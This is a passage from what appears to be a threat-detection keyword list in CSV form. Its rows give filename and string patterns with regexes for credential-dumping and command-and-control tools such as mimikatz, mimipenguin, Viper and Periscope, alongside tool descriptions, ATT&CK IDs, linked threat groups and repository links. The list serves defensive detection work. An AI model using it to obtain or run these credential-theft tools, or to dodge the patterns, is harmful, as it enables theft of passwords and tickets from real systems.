Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52036" "*mimikatz_x64.dll*",".{0,1000}mimikatz_x64\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - 
TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","52037" "*mimikatz_x64.exe*",".{0,1000}mimikatz_x64\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52038" "*mimikatz_x86.dll*",".{0,1000}mimikatz_x86\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","52039" "*mimikatz_x86.exe*",".{0,1000}mimikatz_x86\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52040" "*MimikatzByPowerShellForDomain.py*",".{0,1000}MimikatzByPowerShellForDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool 
which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52041" "*mimikatz-obf.exe*",".{0,1000}mimikatz\-obf\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","52042" "*MimikatzOnLocal.py*",".{0,1000}MimikatzOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52043" "*MimikatzStream should be at offset *",".{0,1000}MimikatzStream\sshould\sbe\sat\soffset\s.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#content","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","52044" 
"*mimikatzsvc*",".{0,1000}mimikatzsvc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52045" "*mimikittenz*",".{0,1000}mimikittenz.{0,1000}","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/orlyjamie/mimikittenz","1","1","N/A","N/A","10","10","1840","334","2024-06-28T11:10:03Z","2016-07-04T13:57:18Z","52046" "*mimilib (mimikatz)*",".{0,1000}mimilib\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz 
keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52047" "*mimilib (mimikatz)*",".{0,1000}mimilib\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52048" "*mimilib for Windows (mimikatz)*",".{0,1000}mimilib\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig 
- PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#description","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52049" "*mimilib for Windows (mimikatz)*",".{0,1000}mimilib\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52050" 
"*mimilib*",".{0,1000}mimilib.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52051" "*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52052" "*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52053" "*mimilib.py*",".{0,1000}mimilib\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52054" "*mimilove*",".{0,1000}mimilove.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52055" 
"*mimilove.exe*",".{0,1000}mimilove\.exe.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52056" "*mimilove.vcxproj*",".{0,1000}mimilove\.vcxproj.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52057" "*mimilove_kerberos*",".{0,1000}mimilove_kerberos.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - 
Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52058" "*mimilove_lsasrv*",".{0,1000}mimilove_lsasrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52059" "*mimipenguin.*",".{0,1000}mimipenguin\..{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52060" 
"*mimipenguin.*",".{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","52061" "*mimipenguin.cna*",".{0,1000}mimipenguin\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52062" "*mimipenguin.git*",".{0,1000}mimipenguin\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52063" "*MimiPenguin.json*",".{0,1000}MimiPenguin\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","52064" "*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting 
